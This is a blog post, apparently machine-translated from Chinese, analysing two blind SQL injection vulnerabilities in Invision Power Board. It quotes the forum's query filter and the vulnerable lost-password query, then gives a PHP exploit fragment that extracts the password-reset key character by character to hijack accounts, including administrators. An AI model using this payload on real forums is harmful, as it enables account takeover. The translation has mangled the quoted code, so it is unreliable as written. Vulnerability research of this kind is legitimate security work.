About the two injection vulnerabilities of ipb recently

5up3rh3iblog

Vulnerability announcement see: http://www.pcsec.org/archives/Invision-Power-Board-Blind-SQL-Injection-Vulnerability.html is obviously urldecode () caused by two encoding problems. I suspect that the discoverer is directly grep urldecode to find...

What's strange is that this time I haven't seen any foreigners give exp? In addition, I have always been very enthusiastic about... so a friend asked me to get an exp, and then I went to someone else... after a few days of "you push me, I push him" process... finally, I lost one exp when flyhat was busy, and I couldn't run it. when I asked, I realized that flyhat was busy with his work and it was about a.m. so I wrote about the basic rack and lost me before testing. I had to check and modify it myself...

According to a rough analysis, the exploitation of the original vulnerability is not that simple, and there are many xx in it. It seems that it makes sense for foreigners not to give exp:

// Ips_kernelclassDbMysqliClient.php
// Ips_kernelclassDbMysqlClient.php

If (! IPS_DB_ALLOW_SUB_SELECTS)
{
# On the spot allowance?
If (! $ This-> allow_sub_select)
{
$ _ Tmp = strtolower ($ this-> _ removeAllQuotes ($ the_query ));

If (preg_match ("#(? :/* | */) # I ", $ _ tmp ))
{
$ This-> throwFatalError ("You are not allowed to use comments in your SQL query. add ipsRegistry: DB ()-> allow_sub_select = 1; before any query construct to allow them ");
Return false;
}

If (preg_match ("# [^ _ a-zA-Z] union [^ _ a-zA-Z] # s", $ _ tmp ))
{
$ This-> throwFatalError ("UNION query joins are not allowed. Add ipsRegistry: DB ()-> allow_sub_select = 1; before any query construct to allow them ");
Return false;
}
Else if (preg_match_all ("# [^ _ a-zA-Z] (select) [^ _ a-zA-Z] # s", $ _ tmp, $ matches ))
{
If (count ($ matches)> 1)
{
$ This-> throwFatalError ("sub select query joins are not allowed. Add ipsRegistry: DB ()-> allow_sub_select = 1; before any query construct to allow them ");
Return false;
}
}
}

In the query () of ipb, there is also an ids, so that/**/is not allowed, and union and select are also judged based on the error prompts of ipb. Their intention is obvious, and sub select is not allowed, by default

Ips_kernelclassDb.php
00053: define (IPS_DB_ALLOW_SUB_SELECTS, 0 );

The SQL statement of the first injection vulnerability is complicated and cannot be commented out by/*, so it is basically difficult to exp. The second vulnerability causes the SQL Injection statement to be relatively simple:

/* Get validating info ..*/
$ Validate = $ this-> DB-> buildAndFetch (array (select => *, from => validating, where => "member_id = {$ in_user_id} and vid = {$ in_validate_key} and lost_pass = 1 "));

And 1 = 1 can be used to close and. this point itself is a blind inj point, so it is basically not a union. Now the difficulty is preg_match_all ("# [^ _ a-zA-Z] (select) [^ _ a-zA-Z] # s ", $ _ tmp, $ matches) If select is not allowed, there is no way to subquery other database items, there is no time to study. Is there any way to break through the select statement to perform cross-table/database queries? [If you have any breakthrough, please let me know]...

Is there any other way to achieve useful attacks? The method is still a bit. This query occurs in the validating table. The vid in this table is the key generated by the password function. If we get this key, you can modify the password of another user, including the administrator ....

I thought this exp was perfect, but I continued to analyze and found the problem again. by default, ipb is saved again. ipb can retrieve the password in two modes. A random change is sent to the user's email [This is the default method]. in addition, the User-Defined password is submitted for direct modification [Detailed code in lostpass. in the public function lostPasswordValidate () of php]. if ipb uses the second method to retrieve the password, we can modify the password of another user to achieve the attack .....

Key fragment of exp:

$ SQL = "55512c93eda811273175c3e00002dec87 or If (ASCII (SUBSTRING (vid ),". $ j. ", 1) = ". $ I. ", 1 = 1, 1 = 2) and 1 = 1 ";
$ Packet = "GET". $ path. "index. php? App = core & module = global & section = lostpass & do = sendform & uid = 1 & aid = ". urlencode ($ SQL)." HTTP/1.0 ";
$ Packet. = "Host:". $ host ."";
$ Packet. = "Connection: Close ";

Summary:

Default Security is very important !!!!

Finally, I would like to thank flyhat for your help ~~